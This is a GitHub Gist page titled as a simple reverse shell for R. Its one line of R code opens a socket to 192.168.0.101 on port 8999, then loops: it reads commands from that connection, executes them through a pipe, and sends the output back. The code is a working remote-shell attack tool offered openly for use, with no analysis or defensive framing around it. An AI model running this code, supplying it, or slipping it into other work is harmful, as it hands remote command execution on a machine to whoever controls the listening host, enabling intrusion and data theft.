- 
      
 - 
        
Save trietptm/05f385df4d2d8c0ee35b217e7307e462 to your computer and use it in GitHub Desktop.  
    Simple reverse shell for R script.
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | c<-socketConnection(host="192.168.0.101",8999,blocking=TRUE,timeout=1000000);while(TRUE){writeLines(readLines(pipe(readLines(c,1))),c)} | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment